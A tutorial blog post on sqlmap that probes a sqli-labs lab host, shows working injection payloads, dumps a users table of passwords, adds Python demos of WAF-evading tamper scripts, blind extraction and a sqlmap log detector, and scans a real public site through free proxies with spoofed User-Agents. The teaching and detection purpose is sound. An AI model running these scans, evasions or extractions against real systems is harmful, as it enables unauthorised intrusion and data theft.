Automated SQL injection detection with SQLMAP

1.1 Introduction to SQLMAP

1.1.1 sqlmap injection detection types

  1. Boolean-based blind detection
  2. Time-based blind detection
  3. Error-based detection
  4. UNION query-based detection
  5. Stacked query-based detection

1.2 Using SQLMAP

1.2.1 SQLMAP help

# sqlmap -h
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

1.2.1.1 Commonly used options

  • -hh: show the advanced help
  • -u: target URL to test
  • -m: scan multiple targets listed in a file
  • -r: load the HTTP request from a file (target URL, headers, body and injection point)
  • -l: test the targets recorded in a Burp Suite or WebScarab proxy log file
  • -b: retrieve the DBMS banner, which identifies the database type and version
  • --dbs: enumerate the available database names
  • -D: database whose tables to enumerate
  • --tables: enumerate table names
  • -T: table whose columns to enumerate
  • --columns: enumerate column names
  • -C: column(s) to retrieve data from
  • --dump: dump the retrieved table entries
  • --users: enumerate DBMS user names
  • --passwords: enumerate the password hashes of the DBMS users
  • --batch: run with the default answers, never prompting for input during the scan
  • --user-agent: set the User-Agent header value
  • --random-agent: use a randomly selected User-Agent header value
  • --proxy: send the probes through a proxy
  • --delay: delay between HTTP requests, in seconds
  • --proxy-file: load a list of proxies from a file
  • --level: level of tests to perform (1-5). By default sqlmap tests all GET and POST parameters; at level 2 or higher it also tests Cookie values, at level 3 or higher the User-Agent and Referer headers, and at level 5 the Host header
  • --current-db: retrieve the current database
  • --current-user: retrieve the DBMS user the application connects as
  • --tamper=space2comment,between: tamper scripts for evading application-layer filters, IPS or WAF; space2comment replaces spaces with /**/ and between rewrites > and = comparisons using BETWEEN
  • --hex: use hex encoding when retrieving data, so non-ASCII characters survive the round trip instead of being mangled by character-set problems; sqlmap decodes the hex on receipt
  • --drop-set-cookie: ignore Set-Cookie headers in responses, so the cookie you supplied is not replaced when the server updates it
  • --time-sec: seconds to wait for a delayed response in time-based blind tests (default 5)
  • --file-read: read a file from the back-end DBMS file system to the local machine
  • --technique=TECH: SQL injection techniques to use (default BEUSTQ, i.e. all of them)
    • B: Boolean-based blind
    • E: Error-based
    • U: UNION query-based
    • S: Stacked queries (several statements in one request, separated by semicolons)
    • T: Time-based blind
    • Q: Inline queries

Note: when you intend to read files from the target, run commands on it, or read the Windows registry through sqlmap, include S, because those features depend on stacked queries where the DBMS supports them.

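To show what the two tamper scripts named above (--tamper=space2comment,between) actually do to a payload, here is an added example: it is not sqlmap's own tamper code but a re-implementation of the documented effect of each script, applied to the boolean-based payload sqlmap reports for Less-1 in section 1.2.2.2. The "naive filter rule" at the end is constructed for the demo to show what such tampers are meant to slip past.

```python
"""Added example, not sqlmap's own tamper code: re-implementations of the
effect of the 'between' and 'space2comment' tamper scripts, chained the way
--tamper=a,b chains them, plus a constructed naive WAF rule to test against."""
import re

def between(payload: str) -> str:
    """Rewrite comparison operators with BETWEEN, as the 'between' tamper does:
       A > B  ->  A NOT BETWEEN 0 AND B
       A = B  ->  A BETWEEN B AND B
    Operands are numbers, identifiers or single-quoted strings. An operand
    whose closing quote is missing (the trailing 'Udod below, closed by the
    application's own quote) is deliberately left alone: duplicating it
    would break the statement."""
    operand = r"(\d+|'[^']*'|\w+)"
    payload = re.sub(r"\s*>\s*" + operand, r" NOT BETWEEN 0 AND \1", payload)
    payload = re.sub(r"\s*=\s*" + operand, r" BETWEEN \1 AND \1", payload)
    return payload

def space2comment(payload: str) -> str:
    """Replace every space outside a quoted string with the inline comment /**/,
    which MySQL treats as whitespace while a filter looking for ' AND ' will not.
    Quote tracking only starts after the first space, so the leading 1' that
    closes the application's own quote is not miscounted as opening one."""
    out, in_quote, seen_space = [], None, False
    for ch in payload:
        if ch == " " and in_quote is None:
            out.append("/**/")
            seen_space = True
            continue
        if seen_space and ch in ("'", '"'):
            in_quote = None if in_quote == ch else (in_quote or ch)
        out.append(ch)
    return "".join(out)

def apply_tampers(payload: str, *tampers) -> str:
    """Chain tampers left to right. Order matters: between runs first so that
    space2comment also covers the spaces BETWEEN introduces (sqlmap itself
    orders scripts by their priority, not by the order given on the command line)."""
    for t in tampers:
        payload = t(payload)
    return payload

# Constructed for the demo: a naive WAF signature for boolean-based injection,
# a whitespace-delimited AND followed by an equality test.
NAIVE_RULE = re.compile(r"\sAND\s+\S+\s*=\s*\S+", re.I)

def blocked_by_naive_rule(payload: str) -> bool:
    return NAIVE_RULE.search(payload) is not None

ORIGINAL = "1' AND 4290=4290 AND 'Udod'='Udod"   # the payload sqlmap reports for Less-1

if __name__ == "__main__":
    tampered = apply_tampers(ORIGINAL, between, space2comment)
    print(tampered)
    print("naive rule blocks original :", blocked_by_naive_rule(ORIGINAL))
    print("naive rule blocks tampered :", blocked_by_naive_rule(tampered))
```

The tampered payload still evaluates to the same truth value on the server, but the literal `AND 4290=4290` that the naive rule keys on no longer appears anywhere in it.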
1.2.2 Probing a single target

1.2.2.1 Running the scan

To test a single URL for SQL injection, use -u or --url:

# sqlmap -u http://192.168.10.159/sqli-labs/Less-1/?id=1

sqlmap reports that the back-end DBMS looks like MySQL and asks whether to skip the payloads specific to other DBMSes; answer Y.

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

It then asks whether, for the remaining tests, to include all MySQL tests beyond the given level (1) and risk (1) values; answer Y.

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

Once the id parameter is found to be vulnerable, it asks whether to keep testing the other parameters; answer Y.

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y

1.2.2.2 Results

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5563 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(5563=5563,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NFrs'='NFrs

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2923 FROM (SELECT(SLEEP(5)))PexQ) AND 'PnAx'='PnAx

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3315' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717071,0x7a4b49646f774f436f474e434a706647745a44676d536c4f764f4f6149615a716b487946726a6358,0x716b717071)-- -
---
[10:47:44] [INFO] the back-end DBMS is MySQL
[10:47:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
web server operating system: Linux CentOS 7
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
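
To make the boolean-based blind and UNION payloads above concrete, here is an added example that is not from the original post and not sqlmap's code: a toy vulnerable endpoint backed by in-memory SQLite, a UNION query that reads data straight off the page, and a boolean-based blind extractor that recovers a value one character at a time through nothing but the true/false oracle, counting the requests it costs. Table, rows and payload shapes are constructed for the demo, and because the dialect is SQLite the character functions differ from the MySQL payloads shown (unicode()/substr() in place of ORD()/MID()).

```python
"""Added example, not code from the original post or from sqlmap: a toy
Less-1-style endpoint on in-memory SQLite plus hand-rolled versions of
technique U (UNION query) and technique B (boolean-based blind)."""
import sqlite3

# Constructed schema modelled on sqli-labs' security.users (three rows only)
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1,'Dumb','Dumb'),(8,'admin','654321'),(15,'root','123456');
""")
REQUESTS = 0   # counts "HTTP requests", so the cost of blind extraction is visible

def vulnerable_page(user_id: str) -> str:
    """Deliberately vulnerable, like Less-1: the id value is pasted into the
    query. Returns the username the page would display, '' when no row comes
    back, and '' on a SQL error too (an error page also reads as 'no row')."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    try:
        row = _DB.execute(sql).fetchone()
    except sqlite3.Error:
        return ""
    return row[0] if row else ""

def union_extract(subquery: str) -> str:
    """Technique U: make the original query return nothing (id=-1) and append
    our own SELECT, whose result the page then renders as the username.
    The trailing '-- -' comments out the application's closing quote and LIMIT."""
    return vulnerable_page(f"-1' UNION SELECT ({subquery})-- -")

def oracle(condition: str) -> bool:
    """Technique B: the same shape as the payload sqlmap found,
    id=1' AND <cond> AND 'Udod'='Udod ; the row (and page content) appears
    only when <cond> is true."""
    return vulnerable_page(f"1' AND ({condition}) AND 'Udod'='Udod") != ""

def blind_extract(subquery: str, max_len: int = 64) -> str:
    """Recover the result of `subquery` through the true/false oracle only,
    binary-searching each character's code point (7 requests per character
    instead of up to ~95 sequential guesses)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite unicode(substr(x,pos,1)) == MySQL ORD(MID(x,pos,1)).
            # Past the end substr() gives '' and unicode('') is NULL, so the
            # comparison is never true and lo stays at 0: end of string.
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out

def blind_extract_with_cost(subquery: str) -> tuple:
    """Same as blind_extract, but also returns how many requests it took."""
    start = REQUESTS
    value = blind_extract(subquery)
    return value, REQUESTS - start

if __name__ == "__main__":
    print("union :", union_extract("SELECT password FROM users WHERE username='admin'"))
    secret, cost = blind_extract_with_cost("SELECT password FROM users WHERE username='admin'")
    print("blind :", secret, "in", cost, "requests")
```

The UNION path needs a single request because the data is reflected in the page; the blind path needs seven requests per character (plus seven to detect the end of the string), which is why sqlmap prefers U and E over B and T whenever they are available, and why `--technique=B` alone is so much slower.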

1.2.3 Probing multiple targets

1.2.3.1 Create a file listing the target URLs

# vim sqlmap.txt
http://192.168.10.159/sqli-labs/Less-1/?id=1
http://192.168.10.159/sqli-labs/Less-2/?id=1
http://192.168.10.159/sqli-labs/Less-3/?id=1

1.2.3.2 Running the scan

# sqlmap -m sqlmap.txt --dbs --users --batch

1.2.3.3 Results

[13:45:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:45:46] [INFO] fetching database users
database management system users [6]:
[*] ''@'centos7-sqlilabs'
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'centos7-sqlilabs'
[*] 'root'@'localhost'

[13:45:46] [INFO] fetching database names
[13:45:46] [INFO] resumed: 'information_schema'
[13:45:46] [INFO] resumed: 'challenges'
[13:45:46] [INFO] resumed: 'mysql'
[13:45:46] [INFO] resumed: 'performance_schema'
[13:45:46] [INFO] resumed: 'security'
[13:45:46] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.4 Probing from an HTTP request file

1.2.4.1 Capture the cookie with Burp Suite

After a successful login, refresh the page to capture the request headers that carry the cookie.

[Image 1]

1.2.4.2 Build the request file

# vim cookie.txt
GET /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.159/sqli-labs/Less-20/
Connection: close
Cookie: uname=admin*
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

1.2.4.3 Running the scan

The asterisk after admin in the Cookie header is sqlmap's custom injection marker: it tells sqlmap exactly which value to inject into, instead of leaving it to guess which header or parameter to test.

# sqlmap -r cookie.txt --level 3 --batch --dbs

1.2.4.4 Results

[14:20:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:20:32] [INFO] fetching database names
[14:20:32] [INFO] retrieved: 'information_schema'
[14:20:32] [INFO] retrieved: 'challenges'
[14:20:32] [INFO] retrieved: 'mysql'
[14:20:32] [INFO] retrieved: 'performance_schema'
[14:20:32] [INFO] retrieved: 'security'
[14:20:32] [INFO] retrieved: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.5 Probing from a Burp Suite log

1.2.5.1 Enable logging in Burp Suite

[Image 2]

1.2.5.2 Browse to the targets so Burp Suite writes log entries

Turn on Burp Suite's Intercept, visit a few URLs, and Forward all of them.

[Image 3]

Log contents:

# cat /home/pinming/Documents/burpsuite.txt
======================================================
2:57:15 PM  http://192.168.10.159:80
======================================================
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=p4htta40u6nis7p003jb4ihcg5
Upgrade-Insecure-Requests: 1
......

1.2.5.3 Running the scan

# sqlmap -l /home/pinming/Documents/burpsuite.txt --level 3 --dbs --batch

1.2.5.4 Results

[14:59:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:59:01] [INFO] fetching database names
[14:59:01] [INFO] resumed: 'information_schema'
[14:59:01] [INFO] resumed: 'challenges'
[14:59:01] [INFO] resumed: 'mysql'
[14:59:01] [INFO] resumed: 'performance_schema'
[14:59:01] [INFO] resumed: 'security'
[14:59:01] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.6 Restricting the injection technique

1.2.6.1 Boolean-based detection only

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --technique=B --batch

1.2.6.2 Results

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod
---
[15:10:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

1.2.7 Enumerating database information

1.2.7.1 Database names

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dbs
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.7.2 Table names

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

1.2.7.3 Column names

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables --columns
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Database: security
Table: referers
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| referer    | varchar(256) |
+------------+--------------+

Database: security
Table: uagents
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| uagent     | varchar(256) |
| username   | varchar(20)  |
+------------+--------------+

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email_id | varchar(30) |
| id       | int(3)      |
+----------+-------------+

1.2.7.4 Column data

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dump -D security -T users -C "username,password"
Database: security
Table: users
[15 entries]
+------------+------------+
| username   | password   |
+------------+------------+
| Dumb       | Dumb       |
| Angelina   | I-kill-you |
| Dummy      | p@ssword   |
| secure     | crappy     |
| stupid     | stupidity  |
| superman   | genious    |
| batman     | mob!le     |
| admin      | 654321     |
| admin1     | admin1     |
| admin2     | admin2     |
| admin3     | admin3     |
| dhakkan    | dumbo      |
| admin4     | admin4     |
| admin'-- + | 123456     |
| root       | 123456     |
+------------+------------+

1.3 SQLMAP request parameters

1.3.1 Defaults

Capturing its traffic shows that SQLMAP's default User-Agent is sqlmap/1.6.5#stable (https://sqlmap.org)

[Image 4]

That signature is unmistakable, so a site administrator or WAF can block our scans on the User-Agent alone.

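The User-Agent is the cheapest signal to filter on, but it is also the cheapest one to change (see --user-agent and --random-agent below), so a defender should also look at what the requests contain. As an added example, not from the original post, here is a small detector that scans Apache combined-format access-log lines for the default sqlmap User-Agent and for the payload shapes seen in the scan output earlier (the random-number equality of boolean tests, SLEEP(), UNION ALL SELECT NULL, the FLOOR(RAND(0)*2) error trick, and the q...q hex markers sqlmap wraps extracted data in), and aggregates hits per client IP so a source is still flagged after it rotates User-Agents. The four log lines are constructed for the demo.

```python
"""Added example, not part of the original post or of sqlmap: detect sqlmap
activity in Apache combined-format access logs by User-Agent and by payload
shape, aggregated per source IP. Sample log lines are constructed."""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "METHOD path proto" status size "referer" "ua"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload fingerprints, matched against the URL-decoded request path. Each
# mirrors the shape of a payload sqlmap emitted against Less-1 above.
_PAYLOAD_RES = {
    "boolean-blind": re.compile(r"\bAND\s+\d{3,5}\s*=\s*\d{3,5}\b", re.I),
    "time-blind":    re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union":         re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "error-based":   re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # sqlmap brackets extracted data with 'q???q' markers, hex-encoded as 0x71......71
    "hex-marker":    re.compile(r"0x71(?:[0-9a-f]{2}){3}71", re.I),
}

def classify(line: str) -> set:
    """Return the set of sqlmap indicators found in one log line (empty if none)."""
    m = _LOG_RE.match(line)
    if not m:
        return set()
    tags = set()
    if "sqlmap/" in m["ua"].lower():
        tags.add("sqlmap-user-agent")
    decoded = unquote_plus(m["path"])      # payloads arrive URL-encoded (%27, %20, ...)
    for name, rx in _PAYLOAD_RES.items():
        if rx.search(decoded):
            tags.add(name)
    return tags

def scan(lines) -> dict:
    """Aggregate indicators per client IP: {ip: {"hits": n, "tags": {...}}}.
    A host that spoofs its User-Agent is still caught by its payloads."""
    report = {}
    for line in lines:
        tags = classify(line)
        if not tags:
            continue
        ip = _LOG_RE.match(line)["ip"]
        entry = report.setdefault(ip, {"hits": 0, "tags": set()})
        entry["hits"] += 1
        entry["tags"] |= tags
    return report

# Constructed sample: one probe with the default UA, two probes from a host
# using a spoofed Firefox UA, and one ordinary visitor.
SAMPLE_LOG = [
    '192.168.10.100 - - [20/Dec/2022:10:47:44 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%204290%3D4290%20AND%20%27Udod%27%3D%27Udod HTTP/1.1" 200 722 "-" "sqlmap/1.6.5#stable (https://sqlmap.org)"',
    '192.168.10.101 - - [20/Dec/2022:11:02:10 +0800] "GET /sqli-labs/Less-1/?id=-3315%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7170717071%2C0x41%2C0x716b717071%29--%20- HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    '192.168.10.101 - - [20/Dec/2022:11:02:16 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%20%28SELECT%202923%20FROM%20%28SELECT%28SLEEP%285%29%29%29PexQ%29%20AND%20%27PnAx%27%3D%27PnAx HTTP/1.1" 200 722 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    '192.168.10.50 - - [20/Dec/2022:11:05:00 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 722 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
]

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["tags"]))
```

Note that the payload patterns only hold for untampered traffic: a scan run with --tamper scripts such as space2comment rewrites the spaces these regexes rely on, so in practice request rate per source and the volume of 4xx/5xx responses are stronger signals than any single string.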
1.3.2 Changing the default request parameters

1.3.2.1 Specifying a User-Agent

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --batch

[Image 5]

With --user-agent, the captured request carries the spoofed value we supplied, so a filter that keys on the default sqlmap User-Agent no longer matches.

1.3.2.2 Random User-Agent

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --random-agent --batch

[Image 6]

1.3.3 Probing through a proxy

Free proxy list: https://www.kuaidaili.com/free/inha/ (bear in mind that every request, including any session cookie you supply, passes through the proxy operator's hands).

A proxy cannot reach targets on your internal network; the target must also be reachable from the Internet.

1.3.3.1 Single proxy

# sqlmap -u "http://www.baidu.com" --proxy "http://202.55.5.209:8090" --delay="1" --random-agent --batch

1.3.3.2 Multiple proxies

# vim proxy.txt
http://183.247.199.114:30001
http://183.247.211.50:30001
http://122.9.101.6:8888

# sqlmap -u "http://www.baidu.com" --proxy-file=/root/proxy.txt --delay="1" --random-agent --batch

1.3.3.3 HTTPS probing

sqlmap can probe HTTPS targets directly; routing it through a local Burp Suite listener is still useful when you want Burp to see, and if necessary modify, every request it sends:

# sqlmap -u "https://www.baidu.com" --proxy "http://127.0.0.1:8080" --delay="1" --random-agent --batch
[Image: sql65.png]

 

Note: this article was last updated on 2022-12-20 20:57:37, more than 483 days ago. Some articles are time-sensitive; if the content or image resources are wrong or no longer available, please contact the site owner. Thank you!
When reposting, please cite this article's link: https://blog.leonshadow.cn/763482/2329.html